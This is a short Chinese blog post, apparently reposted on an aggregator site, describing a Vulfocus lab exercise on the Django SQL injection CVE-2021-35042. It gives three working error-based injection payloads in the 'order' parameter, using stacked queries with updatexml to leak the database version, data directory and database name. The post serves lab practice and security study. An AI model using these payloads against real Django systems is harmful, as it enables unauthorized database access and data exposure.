Vulfocus靶场 | Django SQL注入(CVE-2021-35042)
2022/8/22 2:24:03
本文主要是介绍Vulfocus靶场 | Django SQL注入(CVE-2021-35042),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
漏洞复现
这题通关比较简单,但是django这个漏洞还挺出名的,之前在ctf上也遇到过相关的题目\
直接按照提示,进入了Django报错页面
flag就在里面,直接ctrl+F就能找到
爆数据库版本
order=vuln_collection.id);select updatexml(1,concat(0x7e,(select @@version)),1)%23
爆路径
order=vuln_collection.id);select updatexml(1,concat(0x7e,(select @@datadir)),1)%23
数据库名
order=vuln_collection.id);select updatexml(1,concat(0x7e,(select database())),1)%23
这篇关于Vulfocus靶场 | Django SQL注入(CVE-2021-35042)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-04-01got an unexpected keyword argument
- 2024-03-30维多利亚的秘密 golang入坑系统
- 2024-03-29mongodb sort by date
- 2024-03-29go swagger
- 2024-03-25mongodb cdc
- 2024-03-25how to use go in vscode
- 2024-03-22mongooseserverselectionerror: connect econnrefused ::1:27017
- 2024-03-21pymongo insert_many
- 2024-03-18projection mongodb
- 2024-03-14clickhouse-go
